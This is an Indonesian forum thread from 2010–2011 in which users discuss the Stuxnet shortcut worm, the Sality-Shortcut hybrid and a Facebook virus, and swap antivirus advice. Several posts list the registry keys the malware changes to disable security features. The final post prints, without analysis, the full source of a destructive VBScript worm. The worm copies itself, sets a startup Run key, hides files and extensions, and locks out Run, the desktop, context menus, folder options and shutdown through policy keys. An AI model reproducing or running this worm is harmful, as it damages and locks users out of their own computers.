okeh para mastah bntu saya y skdar share n cuman mw tw aja ttg 2 virus yg nakal ini..... ~x( >=)

hehe kira2 ccok g y jd calon VISer hehe \m/
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ryan BeKaBe pada November 27, 2010, 09:54:35 AM
@ Tirta: To do point aja neh bro. Klo kmu mau bedain yg mana Stuxnet yg mana ShortCut biasa, silakan lihat di Propertiesnya, pasti berbeda deh dengan ShortCut umumnya!
Haha, mau jadi Viser juga? Boleh juga tuh bantuin saya nyulik virus dari disk orang, tp pastikan kmu kebal virus dulu, baru deh join! Okey! ;)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: saga_tirta pada November 27, 2010, 10:35:21 AM
iya sih mas Ryan ...mmg beda propertiesx ...lo shortcut ink...
dan file2 mmbntux biasax EXE ato Scr...ato Dll...yg biasax dbuat dgn Visual basic...
tp yg saya bnunkan itu knp toh tiap ada shortcut pasti ada stuxnet nah brrti ni virus gabung y fusion gtu... =)) =)) =))kaya dragon ball aja kwkwwk...
ahahhaha pgen sih masalhax g ada fasilitasx tkutnya kompi org knp2 ...ahhahah saya kan masih NUBie KK... \m/ ^:)^
Judul: Re: Bedah Virus Disini !
Ditulis oleh: c0d3HitLER pada November 27, 2010, 11:22:32 AM
he.he di blog saya juga ada  :-bd

(http://kopastuntas.files.wordpress.com/2010/11/mcdonaldvirus.jpg?w=640&h=190)


(http://kopastuntas.files.wordpress.com/2010/11/virus-mcdonal-di-facebook1.jpg?w=620&h=310)


(http://kopastuntas.files.wordpress.com/2010/11/virus-mcdonal-di-facebook3.jpg?w=620&h=310)


http://kopastuntas.wordpress.com/2010/11/02/virus-mcdonald-menyebar-di-facebook/ (http://kopastuntas.wordpress.com/2010/11/02/virus-mcdonald-menyebar-di-facebook/)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ryan BeKaBe pada November 27, 2010, 11:47:54 AM
Tirta: Maksud saya: "yg mana Stuxnet yg mana ShortCut biasa, silakan lihat di Propertiesnya, pasti berbeda deh dengan ShortCut umumnya!", bukan "lo shortcut ink... dan file2 mmbntux biasax EXE ato Scr", hayo belum paham ya?
8)

c0d3HitLER: Daku ijin berkunjung ya? Jangan lupa minumya, cukup cendol segelas! ;)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: saga_tirta pada November 27, 2010, 12:07:35 PM
AYOYO .....
hahaha iyah bang ngrti kok mksdx lo stuxnet TMP kan.....propertiesx..

hahaha oiya aq tw...jd lo propertiesx stuxnet gmna bang ahaha dudul aq nie knp jd mlah extension file ....ahhah kalo properties itu type file x kan mas ryan??  ^:)^ ^:)^ ^:)^
monggo mas jwb dulu
p yg saya bnunkan itu knp toh tiap ada shortcut pasti ada stuxnet nah brrti ni virus gabung y fusion gtu??
brrti 2 virus ini bersatu y??? :-\ :-\
Judul: Re: Bedah Virus Disini !
Ditulis oleh: c0d3HitLER pada November 27, 2010, 12:33:43 PM
Tirta: Maksud saya: "yg mana Stuxnet yg mana ShortCut biasa, silakan lihat di Propertiesnya, pasti berbeda deh dengan ShortCut umumnya!", bukan "lo shortcut ink... dan file2 mmbntux biasax EXE ato Scr", hayo belum paham ya?
8)

c0d3HitLER: Daku ijin berkunjung ya? Jangan lupa minumya, cukup cendol segelas! ;)
oke dah bang, tp maap si mcdonald ude tlanjur ilang
.he.he :D
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Boi inside pada November 27, 2010, 01:32:33 PM
serem juga virusnya....  :o tapi saya tetap bangga karna asli indo :-bd
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ryan BeKaBe pada November 27, 2010, 02:58:19 PM
Tirta: Huaaa.... T.T
Susah jelasinnya.
N'tar deh saya upload gambarnya biar bisa lebih dipahami, lagi minim koneksi nih, gak bisa berbuat banyak tuk innetan. J.J
Judul: Re: Bedah Virus Disini !
Ditulis oleh: c0d3HitLER pada November 27, 2010, 06:30:08 PM
Tirta: Huaaa.... T.T
Susah jelasinnya.
N'tar deh saya upload gambarnya biar bisa lebih dipahami, lagi minim koneksi nih, gak bisa berbuat banyak tuk innetan. J.J
ksi aja gambar shortcut hasil manipulasi n propertiesnya, bandingkan dgn shortcut yang bukan virus
klo ada di netbook ane ntar ane bantu post :-bd

Ralat :
shortcut virus di netbook ane ilang
semua virusnya jg ilang  :'( :'( :'(

td juga diminta om Ryan BeKaBe
tp keburu ilang virus mcdonald n yg lainnya :'(
Judul: Re: Bedah Virus Disini !
Ditulis oleh: mastan pada November 28, 2010, 01:34:00 AM
Wah Gue bru lhat nich virus kaya gni, makasih infonya ya...... :-bd :-bd :-bd
Judul: Re: Bedah Virus Disini !
Ditulis oleh: noviyanto pada Desember 01, 2010, 06:50:19 PM
Mas cara menghapus virus servik gimana y.... :(
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ryan BeKaBe pada Desember 08, 2010, 05:25:51 AM
Tirta: http://bekabe.blogspot.com/2010/12/perbedaan-propertis-file-shortcut.html (http://bekabe.blogspot.com/2010/12/perbedaan-propertis-file-shortcut.html)
Nih gambarnya: (http://3.bp.blogspot.com/_vzXuqp7I180/TP6wQkt4XpI/AAAAAAAAAL0/Mmis8z_HfyA/s320/Properti+Stuxnet+VS+SC+Biasa.JPG)
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ryan BeKaBe pada Desember 08, 2010, 05:34:05 AM
c0d3HitLER: Wah, kok bisa hilang? Dimakan AV kah?
Judul: Re: Bedah Virus Disini !
Ditulis oleh: saga_tirta pada Desember 08, 2010, 09:03:57 AM
wadah ternyata bgtu toh propertiesx..... :-bd
baru tw saya prbedaanx ... :-bd :-bd :-bd :-bd
Judul: Re: Bedah Virus Disini !
Ditulis oleh: c0d3HitLER pada Desember 08, 2010, 11:18:53 AM
c0d3HitLER: Wah, kok bisa hilang? Dimakan AV kah?
yg virus shortcut kemakan av

klo yg mcdonald keburu tak hapus, drpd risiko informasiku kesebar :D
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ryan BeKaBe pada Desember 09, 2010, 06:26:56 AM
@HitLER: Wek? Mmangnya MCDonald itu trojan kah yg bisa mencuri informasi gitu?
Judul: Re: Bedah Virus Disini !
Ditulis oleh: c0d3HitLER pada Desember 09, 2010, 08:48:19 AM
@HitLER: Wek? Mmangnya MCDonald itu trojan kah yg bisa mencuri informasi gitu?
gtw juga sih, tp nyebarnya lewat aplikasi FB pke download attachment segala :-\
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Ryan BeKaBe pada Desember 09, 2010, 10:16:03 AM
@HitLER: Oke deh, terima kasih infonya! Saatnya menjelajah....
Judul: Re: Bedah Virus Disini !
Ditulis oleh: c0d3HitLER pada Desember 09, 2010, 12:22:15 PM
@HitLER: Oke deh, terima kasih infonya! Saatnya menjelajah....
sama" om :-bd
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Starscream pada Desember 15, 2010, 07:32:01 PM
Ini yang aku hadapi tadi malam, setelah pulang dari wnet, waktu  colok fd di rumah tiba2 aja smadav langsung detect virus ini. . . Avira cuman blocking autorun.inf.backup. Selama ini aku pake ver 8.2, kok bandel ya virusnya ? Bisa di hapus, tapi balik lagi, hampir nyerah, pake 8.3 baru bisa. . .  Clear dah . . .  Makasih gan, makasih smadav !!
Judul: Re: Bedah Virus Disini !
Ditulis oleh: saga_tirta pada Desember 15, 2010, 07:44:55 PM
SEKEDAR info ada varian baru worm shortcut gabung bareng mba sality......... :-bd :-bd ~x( ~x(
nah bsa kalian lihat lbh jlas dsni........ :P.

"pembuat virus juga rupanya membuat virus hybrid, dan kabar buruknya adalah kali ini yang terjadi adalah keunggulan dari dua virus yang paling bandel dan ganas Sality dan Shortcut disatukan menjadi satu virus baru "
http://vaksin.com/2010/1210/sality-shortcut/sality-shortcut.html
saya ambil dr vaksin .... :D :D ;) ;D :-X
bnyak bgt lo brbhayanya ni virus.......
-Melakukan blok/disable terhadap fungsi Windows seperti (Task manager dan Registry Editor)
-Mematikan proses dari aplikasi "security" (antivirus, antispyware, dll)
-Mematikan "System Restore"
-Mematikan "Safe Mode" atau "Safe Boot"
-Mematikan fungsi Security Center
Agar program dan aplikasi keamanan tidak dapat berjalan dengan normal, maka virus merubah key berikut :
AntiVirusDisableNotify
AntiVirusOverride
FirewallDisableNotify
FirewallOverride
UacDisableNotify
UpdatesDisableNotify
 :D :D :D :D :D
serem kan nah pembersihanx bsa dtgin link diatas.....
oiya tambahan bukan hnya mbak sality yg mnfaatin si shortcut tp juga ada...
Sality (Sector atau Tanatos)
Zeus (Zbot atau botnet)
Chymine (worm YM atau conime/secupdat)
Stuxnet (Winsta)(@ mas ryan jwaban yg kmren brrti trjawwab bhwa winsta mnfaatin virus shortcut,....)
nah itu bbrapa malware yg manfaatin worm shortcut....
hehe  :D :D :D :D :D :D :D
materi dr vaksin :D :D :D :D :D ;) ;) ;) ;)
NOte: saya prnh ktmu ni virus smadav terbaru cm dtek shortcutx sdgkan salityx g trdetek...
moga drevisi brikutx bsa diatasi
Judul: Re: Bedah Virus Disini !
Ditulis oleh: kalayana.tantri pada Desember 15, 2010, 10:09:58 PM
SEKEDAR info ada varian baru worm shortcut gabung bareng mba sality......... :-bd :-bd ~x( ~x(
nah bsa kalian lihat lbh jlas dsni........ :P.

"pembuat virus juga rupanya membuat virus hybrid, dan kabar buruknya adalah kali ini yang terjadi adalah keunggulan dari dua virus yang paling bandel dan ganas Sality dan Shortcut disatukan menjadi satu virus baru "
http://vaksin.com/2010/1210/sality-shortcut/sality-shortcut.html
saya ambil dr vaksin .... :D :D ;) ;D :-X
bnyak bgt lo brbhayanya ni virus.......
-Melakukan blok/disable terhadap fungsi Windows seperti (Task manager dan Registry Editor)
-Mematikan proses dari aplikasi "security" (antivirus, antispyware, dll)
-Mematikan "System Restore"
-Mematikan "Safe Mode" atau "Safe Boot"
-Mematikan fungsi Security Center
Agar program dan aplikasi keamanan tidak dapat berjalan dengan normal, maka virus merubah key berikut :
AntiVirusDisableNotify
AntiVirusOverride
FirewallDisableNotify
FirewallOverride
UacDisableNotify
UpdatesDisableNotify
 :D :D :D :D :D
serem kan nah pembersihanx bsa dtgin link diatas.....
oiya tambahan bukan hnya mbak sality yg mnfaatin si shortcut tp juga ada...
Sality (Sector atau Tanatos)
Zeus (Zbot atau botnet)
Chymine (worm YM atau conime/secupdat)
Stuxnet (Winsta)(@ mas ryan jwaban yg kmren brrti trjawwab bhwa winsta mnfaatin virus shortcut,....)
nah itu bbrapa malware yg manfaatin worm shortcut....
hehe  :D :D :D :D :D :D :D
materi dr vaksin :D :D :D :D :D ;) ;) ;) ;)
NOte: saya prnh ktmu ni virus smadav terbaru cm dtek shortcutx sdgkan salityx g trdetek...
moga drevisi brikutx bsa diatasi

kemungkinan (menurut gw):
1.memang si pembuat sality mengunakan teknik yang digunakan oleh vm shortcut, atau sebaliknya.
2.vm kedua virus tersebut adalah orang yang sama.
3.vm dari shortcut ngga tau kalo komputernya terinfeksi sality, sehingga virusnya terinfeksi oleh sality.

note:
  gw ngga pernah terserang virus shortcut, jadi ngga tau pake bahasa apa si shortcut itu.
  tapi menurut gw, opsi no 3 kemungkinan terbesarnya.
      

Judul: Re: Bedah Virus Disini !
Ditulis oleh: saga_tirta pada Desember 15, 2010, 10:57:04 PM
@kalayana cb masuk ksitus vaksin dstu ada pnjlasan ttg virus hybrid ini

"Virus Sality-Shortcut dibuat menggunakan bahasa C yang telah di-kompres menggunakan program UPX dan memiliki ukuran file yang bervariasi. File virus utama memiliki ekstensi file exe (application) dan file pif (Shortcut to MS-Dos)."

jd ada cara pmbuatanx yg pasti VM ini mmbuat virus sality dan jg mnggbungkanx dgn shortcut,...
CMIIW :D
yang pasti qt tdk tw sapa yg mmbuat virus ini ...nah mnrt saya virus ini cm pgmbangan dr kdua virus
Judul: Re: Bedah Virus Disini !
Ditulis oleh: kalayana.tantri pada Desember 15, 2010, 11:20:57 PM
@kalayana cb masuk ksitus vaksin dstu ada pnjlasan ttg virus hybrid ini

"Virus Sality-Shortcut dibuat menggunakan bahasa C yang telah di-kompres menggunakan program UPX dan memiliki ukuran file yang bervariasi. File virus utama memiliki ekstensi file exe (application) dan file pif (Shortcut to MS-Dos)."

jd ada cara pmbuatanx yg pasti VM ini mmbuat virus sality dan jg mnggbungkanx dgn shortcut,...
CMIIW :D
yang pasti qt tdk tw sapa yg mmbuat virus ini ...nah mnrt saya virus ini cm pgmbangan dr kdua virus

oh, gitu ya. sorri. karena yang gw tau, sality adalah PE infector, jadi kalo PE infector kok agak gendut ya?.
sedangkan sample yang gw punya tuh,perbedaan inang asli ama yang udah terinfeksi sality terpaut 28 KB. jadi yang ada di situs vaksin bukan
file asli virus. tapi ngga tau juga sih kalo si  VM sality berubah haluan.
Judul: Re: Bedah Virus Disini !
Ditulis oleh: saga_tirta pada Desember 16, 2010, 10:55:01 AM
@kalayana cb masuk ksitus vaksin dstu ada pnjlasan ttg virus hybrid ini

"Virus Sality-Shortcut dibuat menggunakan bahasa C yang telah di-kompres menggunakan program UPX dan memiliki ukuran file yang bervariasi. File virus utama memiliki ekstensi file exe (application) dan file pif (Shortcut to MS-Dos)."

jd ada cara pmbuatanx yg pasti VM ini mmbuat virus sality dan jg mnggbungkanx dgn shortcut,...
CMIIW :D
yang pasti qt tdk tw sapa yg mmbuat virus ini ...nah mnrt saya virus ini cm pgmbangan dr kdua virus

oh, gitu ya. sorri. karena yang gw tau, sality adalah PE infector, jadi kalo PE infector kok agak gendut ya?.
sedangkan sample yang gw punya tuh,perbedaan inang asli ama yang udah terinfeksi sality terpaut 28 KB. jadi yang ada di situs vaksin bukan
file asli virus. tapi ngga tau juga sih kalo si  VM sality berubah haluan.
nah itu yg saya jg kurang tau......
mngkin ini pgmbanaganx.... :P
 ^:)^ ^:)^ ^:)^
Judul: Re: Bedah Virus Disini !
Ditulis oleh: aldy wizznu pada Desember 16, 2010, 02:53:30 PM
makasih bgt infonya, eh, udh bnyk blm yg kena ini? O ya, dulu laptopku prnh kena virus shortcut, smua file di flashdisk ma harddisk di laptop kehidden n malah muncul shortcut buanyak. Terus juga muncul file virus yg namanya random, kyk qktier.exe, qktier.scr ma bnyk lg
Judul: Re: Bedah Virus Disini !
Ditulis oleh: saga_tirta pada Desember 16, 2010, 03:59:49 PM
makasih bgt infonya, eh, udh bnyk blm yg kena ini? O ya, dulu laptopku prnh kena virus shortcut, smua file di flashdisk ma harddisk di laptop kehidden n malah muncul shortcut buanyak. Terus juga muncul file virus yg namanya random, kyk qktier.exe, qktier.scr ma bnyk lg

wahahhaha tu varian lama msh awal2 shortcutttt......
klo skrg lbh sadis.....
td malam aq jg nemu virus shortcut-sality......
pas lg baikin laptop tmen........
wew bner2  shortcutx ada salityx ada n bnyak bgt file.exe yg kna.......
hbat uiiiiii :-bd :P ~x(
Judul: Re: Bedah Virus Disini !
Ditulis oleh: aldy wizznu pada Desember 16, 2010, 05:05:50 PM
makasih bgt infonya, eh, udh bnyk blm yg kena ini? O ya, dulu laptopku prnh kena virus shortcut, smua file di flashdisk ma harddisk di laptop kehidden n malah muncul shortcut buanyak. Terus juga muncul file virus yg namanya random, kyk qktier.exe, qktier.scr ma bnyk lg

wahahhaha tu varian lama msh awal2 shortcutttt......
klo skrg lbh sadis.....
td malam aq jg nemu virus shortcut-sality......
pas lg baikin laptop tmen........
wew bner2  shortcutx ada salityx ada n bnyak bgt file.exe yg kna.......
hbat uiiiiii :-bd :P ~x(
beruntungnya aku ga pernah kena virus itu  :-bd
Judul: Re: Bedah Virus Disini !
Ditulis oleh: agus007 pada Januari 07, 2011, 01:23:57 PM
kk ane mw nanya, kna vrus apa y yang ane kna..
website antivirus smua na g bsa d buka..
pertamanya bsa, trus lma2 kluar pesan server na g ad..
gmna nih gan????
Judul: Re: Bedah Virus Disini !
Ditulis oleh: callmefreek pada Januari 07, 2011, 02:07:20 PM
mau tanya ni- komputer kantor ana semua pada terjangkiti virus "Serverx" kira kira dengan smadav bisa mengatasi gak ya terutama yang versi 8.3 ?

mohon bantuannya
Judul: Re: Bedah Virus Disini !
Ditulis oleh: sang pada Januari 11, 2011, 10:52:37 PM
 :D salam kenal sob.. luar biasa uraiannya sob..  :-bd
Judul: Re: Bedah Virus Disini !
Ditulis oleh: arisrisyandi pada Januari 16, 2011, 05:02:09 PM
jawara" virus, mau tanya nih klo tiap .exe disangka virus. pas di scan trus di repair kira" bakal sempurna ga?? apa malah jadi rusak ?? klo rusak bisa di benerin lagi ga ?? soal nya di folder ane isinya program mentahan semua T_T. klo di scan trus pada ilang kan cape lagi nyarinya hikz mohon penyegaran jasmani nya  ^:)^ ^:)^
Judul: Re: Bedah Virus Disini !
Ditulis oleh: agus_suardana pada Januari 16, 2011, 05:27:39 PM
pke av ap sob.?
sprti ny pke avira ya.?
klo di repair sih bisa bgus sob
file ga rusak tpi virus ilang
Judul: Re: Bedah Virus Disini !
Ditulis oleh: arisrisyandi pada Januari 17, 2011, 02:26:17 AM
pke av ap sob.?
sprti ny pke avira ya.?
klo di repair sih bisa bgus sob
file ga rusak tpi virus ilang

bener ane pake avira n smadav hh..
iya nih dah di coba .. tp ga total kembali ada beberapa yang ilang kyk keygnt ..
tp gpp lah pengalaman bsa di cari lagi program mah .. tq yah  :D :D :D
Judul: Re: Bedah Virus Disini !
Ditulis oleh: agus_suardana pada Januari 17, 2011, 08:24:30 AM
yoa sob
jgn lupa cendol ny
oya sob skdar info aj
klo avira emg pya klemahan klo dia sring detek file .exe sbg virus
ane nyaranin sih pke KAV 2011 aj klo mw yg free pke Avast aj sob :D
Judul: Re: Bedah Virus Disini !
Ditulis oleh: amoel pada Januari 17, 2011, 09:19:21 AM
mo nanya ni. aku punya file exe, pas mau tak copas dari pc ke laptop, itu dianggap virus oleh smadav ver8.3.
laptop pake smadav8.3. trus yang pc pake Kaspersky Internet Security 2010 sama smadav8.3.
waktu di pc ndak kedetek virus, tapi waktu aku copas ke laptop langsung dianggap virus.
trus laptop aku install mcafee, lalu muncul semua virus yang menginfeksi file sistemnya(windows XP).
sehingga windows minta diinstall ulang. soale banyak file system yang dihapus oleh mcafee.
yang mau kau tanyakan.
apa file exe yang tidak mengandung virus(dari pc) itu waktu di copas ke laptop yang sudah kena virus akan dianggap virus file exe tsb? 

thx
Judul: Re: Bedah Virus Disini !
Ditulis oleh: sang pada Januari 17, 2011, 10:17:44 AM
mo nanya ni. aku punya file exe, pas mau tak copas dari pc ke laptop, itu dianggap virus oleh smadav ver8.3.
laptop pake smadav8.3. trus yang pc pake Kaspersky Internet Security 2010 sama smadav8.3.
waktu di pc ndak kedetek virus, tapi waktu aku copas ke laptop langsung dianggap virus.
trus laptop aku install mcafee, lalu muncul semua virus yang menginfeksi file sistemnya(windows XP).
sehingga windows minta diinstall ulang. soale banyak file system yang dihapus oleh mcafee.
yang mau kau tanyakan.
apa file exe yang tidak mengandung virus(dari pc) itu waktu di copas ke laptop yang sudah kena virus akan dianggap virus file exe tsb? 

thx

coba sebelum di Install ulang kirim dulu kesini contoh file exe yang kena viruesnya untuk ditest sob.. jadi biar sama sama dibahas dan bagaimana jalan keluar yang baiknya sob.. tapi ya sudahlah sob.. terlanjur sudah di Install ulang sob..  :D
smadav nya pro atau yang free sob..  ???  :-\
Judul: Re: Bedah Virus Disini !
Ditulis oleh: agus_suardana pada Januari 17, 2011, 10:20:21 AM
@up
mgkin memang sudah terinfeksi virus sob soal ny laptop mu cma di guard am smadav ga ad av impor laen
nah wktu km msukin mcafee lngsung hpus aj sob
ya ksimpulan mgkin emg udh di infeksi virus :D
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Desperados pada Januari 17, 2011, 02:20:17 PM
Cmd aja di duga virus ama smadav
prlu dktahui.. da jga malcode/malware yg berjenis CMD..
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Section pada Januari 27, 2011, 02:28:40 PM
ni mungkin tips nya agak out of date ato mungkin udah pada tahu... tapi ga salah gw remind lagi...

kadang muncul virus yg ga bisa di kill process... katanya itu service lah... ato diprotect lah (macam tamper)... nah ada cara unik yang dulu gw pernah coba... Bagi yg pernah install Visual Studio bisa melakukan ini... jadi klik kanan prosesnya terus pilih debug... dan whoala... proses pun berhenti! dan kalo udah selesai "ngedebug"nya... ya tinggal close debuggernya...

hihiihiih...
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Deny MiniDwarf pada Januari 28, 2011, 05:01:12 PM
mau tanya ni- komputer kantor ana semua pada terjangkiti virus "Serverx" kira kira dengan smadav bisa mengatasi gak ya terutama yang versi 8.3 ?

mohon bantuannya
ane maren ketemu nih virus..cuam sebelum ditest sama smadav dak keburu dibasmi sama avg...
Judul: Re: Bedah Virus Disini !
Ditulis oleh: 7amos7 pada Pebruari 14, 2011, 01:09:47 PM
halo mastah2.. ane punya masalah nih.. kemarin ane scan laptop ane pake smadav rev 8.4, nah ane dapat 3 worm yang namanya securitytool. file locationnya di wmvdecod.dll. terus ane fix all, nah wormnya pindah ke quarantine. terus siap itu ane remove tuh kan ya...

pas ane restart terus scan untuk kedua kalinya, eh ane nemu lagi ma tuh 3 biji wormnya gan.. kira2 masalah ane kenapa ya? kok bisa wmvdecod.dll ane dikira worm gan? terus ane nanya di kaskus, katanya false alarm gan.. apa benar mas gan? emang udah ane scan pake microsoft security essentials, malware bytes, sama kaspersky removal tools ga dapat apa2...

kalo emang itu virus cara ilanginnya gimana ya mas gan? soalnya tiap ane delete tetep aja muncul dia pas ane restart... tolong solusi ya mas bro.. makasih sebelumnya...
Judul: Re: Mengatasi Virus FLyff 666.dll.vbs
Ditulis oleh: cybergun pada Pebruari 16, 2011, 11:15:13 AM
mangstap gan, ane dah buka lewat notepad isinya kayak gini


Sorry but you are not allowed to view spoiler contents.
Judul: Re: Bedah Virus Disini !
Ditulis oleh: Desperados pada Pebruari 16, 2011, 08:58:23 PM
set mf = fs.getfile(Wscript.ScriptFullname)

ini cuilan kode vbs malscript diatas.. klo mw d deteknx... "Wscript.ScriptFullname" itu d jadiin kode utk heuristiknya....  :-bd :-bd :-bd
Judul: Re: Bedah Virus Disini !
Ditulis oleh: 7amos7 pada Pebruari 19, 2011, 06:29:09 PM
a
Judul: SCRIPT LUMAYAN TERKENAL
Ditulis oleh: Kill All Viruses pada Pebruari 19, 2011, 09:14:49 PM
Kutip
On Error Resume Next
spawn()
sub spawn()
Set s = CreateObject("Scripting.FileSystemObject")
Set f = s.GetFile(wscript.scriptfullname)
f.Copy ("c:\F*U**.vbs")
f.Copy ("c:\Opened\F*U**\s***\F*U**.vbs")
f.Copy ("c:\Dra.....Jatim.vbs")
f.Copy ("c:\Gamers1.vbs")
end sub
msgbox "Virus Start up aaahhhh...!", ,"Error Warning. . . !"
msgbox "Otak-atik nama IE ah...!", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "File Hiden gak bisa dilihat,,,gawat.....!", ,"Error Warning. . . !"
msgbox "wow...!Extensinya juga...!", ,"Error Warning. . . !"
msgbox "Hahahah.....wow super Hident bro....", ,"Error Warning. . . !"
msgbox "wahh.......Kaget nicH...!", ,"Error Warning. . . !"
msgbox "waduhh...Wa;papernya gak bisa diganti...!", ,"Error Warning. . . !"
msgbox "gak ada shutdownnya...!", ,"Error Warning. . . !"
msgbox "hahaha...makin parah aja ni koputer,,,!", ,"Error Warning. . . !"
msgbox "Gak bisa menuin kite ye...!", ,"Error Warning. . . !"
msgbox "wahh...apalagi folder optionnya ilang...!", ,"Error Warning. . . !"
msgbox "Gak bisa lari kemana-mana hayooo..!", ,"Error Warning. . . !"
msgbox "gak bisa bakar-bakar CD nuich", ,"Error Warning. . . !"
msgbox "klik kanan donk,,oh gak jadi...!", ,"Error Warning. . . !"
msgbox "di toolbar juga,,gawat,,,", ,"Error Warning. . . !"
msgbox "gak bisa pake hotkey,gak hot nih...", ,"Error Warning. . . !"
msgbox "wah..iconnya ilang....keren..", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "huft...gak bisa shutdown deh...!", ,"Error Warning. . . !"
msgbox "parahh..loe PC...!", ,"Error Warning. . . !"
msgbox "Hardisk diilangin juga nih,,,,", ,"Error Warning. . . !"
msgbox "Ane butuh CMD...", ,"Error Warning. . . !"
msgbox "buka Regedit gak bisa YChD", ,"Error Warning. . . !"
msgbox "Virusnya kill ah pke Task menager,,ha..gak bisa.!", ,"Error Warning. . . !"
msgbox "gak ada screan severnya,,,gak kereeen...!", ,"Error Warning. . . !"
msgbox "cuapeee nih virus...!", ,"Error Warning. . . !"
msgbox "Okeyy,,,lanjuttt....", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "Gak ada control panel", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "Aplikasi ku gak bisa dibukaaaaaaaaa.........!", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "F*U** YOUR SYSTEM", ,"Error Warning. . . !"
msgbox "Huft selesai jga,,,otak-atik komputer loe...!", ,"Error Warning. . . !"
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\User",winpath&"\Vir.32.dll.vbs"
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","<<--Worm_ by Kefi And 9a Friends-->>"
rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop\NoChangingWallpaper", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\CleanShutdown", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\FaultTime", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCDBurning", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWinKeys", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoTrayContextMenu", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Shutdown_Settings", "1", "REG_DWORD"
rg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\System", "1", "REG_DWORD"
